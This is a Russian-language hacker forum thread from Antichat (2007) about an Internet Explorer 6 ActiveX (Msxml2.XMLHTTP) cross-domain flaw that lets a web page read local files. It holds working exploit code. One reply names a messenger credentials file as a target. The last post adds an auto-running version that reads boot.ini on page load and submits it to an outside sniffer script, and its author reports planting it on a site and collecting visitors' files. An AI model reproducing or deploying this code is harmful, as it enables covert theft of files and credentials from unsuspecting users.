Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Cross Domain Scripting в Осле |
30.06.2007, 11:41
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137
Репутация:
201
|
|
Cross Domain Scripting в Осле
Недавно, изучая стандартные ActiveX компоненты на предмет уязвимостей, наткнулся на одну занятную вещь: если ActiveX компонент Msxml2.XMLHTTP объявить, как показано ниже, на него не действуют ограничения безопасности. Поэтому можно просмотреть произвольный локальный (например file:///c:/boot.ini) или удаленный (http://forum.antichat.ru) файл с любого домена. Тестировал на IE 6 XP SP2 - работает, на IE 7 Vista - нет. Может есть у кого полностью запатченный Осел, проверить, исправил ли Мелкософт этот баг?
Код HTML:
<script>
function readfile(filename)
{
try
{
var xmlobj = document.createElement ('object');
xmlobj.setAttribute ('id','xmlobj');
xmlobj.setAttribute ('classid','clsid:88D969EA-F192-11D4-A65F-0040963251E5');
xmlobj.open ('get',filename, false);
xmlobj.send ();
var text = xmlobj.responseText;
xmlobj = null;
return text;
}
catch(e)
{
return 'Ошибка! '+e.description;
}
}
</script>
<textarea id='text1' cols=60 rows=15></textarea></br>
<input size=58 id='file1'/>
<input type=button value='Открыть' onclick='text1.value=readfile(file1.value)'/>
|
|
|
05.07.2007, 16:21
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375
Репутация:
4268
|
|
Хм. Довольно интересная информация. Но вот я не очень понимаю, что это может дать? Автор объясни пожалуйста! И, наконец, кто нить у кого пропатченный есть осел, скажите, залатали или нет?
__________________
...
|
|
|
|
05.07.2007, 16:51
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Локальные файлы не показывает, удалённые показывает
|
|
|
|
05.07.2007, 18:08
|
|
Участник форума
Регистрация: 01.02.2005
Сообщений: 233
Провел на форуме:
748321
Репутация:
112
|
|
а удобно былоб.. надергал локально инфы.. и через тот же Get выслал на гейт куданить ))
првоерил локально не пашет =\
|
|
|
|
05.07.2007, 19:31
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137
Репутация:
201
|
|
удаленные читает с любых доменов?
как указываете путь к файлу?
Alexsize
file://localhost/c:/Program Files/QIP/Users/Accounts.cfg и т.д. и т.п  |
|
|
|
05.07.2007, 19:57
|
|
Участник форума
Регистрация: 07.01.2007
Сообщений: 259
Провел на форуме:
309455
Репутация:
41
|
|
У меня осел сразу ругается на содержимое сайта, хотя если ему запретить блокировать activex, все работает.
|
|
|
|
09.07.2007, 10:04
|
|
Познающий
Регистрация: 26.01.2007
Сообщений: 46
Провел на форуме:
283785
Репутация:
28
|
|
у мя Maxthon читает как локальные так и удаленные вот чуть чуть доделал
<html>
<script>
function readfile(filename)
{
try
{
var xmlobj = document.createElement ('object');
xmlobj.setAttribute ('id','xmlobj');
xmlobj.setAttribute ('classid','clsid:88D969EA-F192-11D4-A65F-0040963251E5');
xmlobj.open ('get',filename, false);
xmlobj.send ();
var text = xmlobj.responseText;
xmlobj = null;
return text;
}
catch(e)
{
return 'Ошибка! '+e.description;
}
}
</script>
<form action="http://sniffer.ru/sniffer.php" id=form1 method="GET">
<textarea name='text1' value=" " cols=60 rows=15></textarea><br>
<input type="submit">
</form>
<input type="hidden" name="file1" value="file:///C:\boot.ini" />
<body onload="javascript :text1.value=readfile(file1.valu e); javascript :form1.submit();">
</html>
ставил на сайт через фрейм пришло давольно много файлов boot.ini  |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
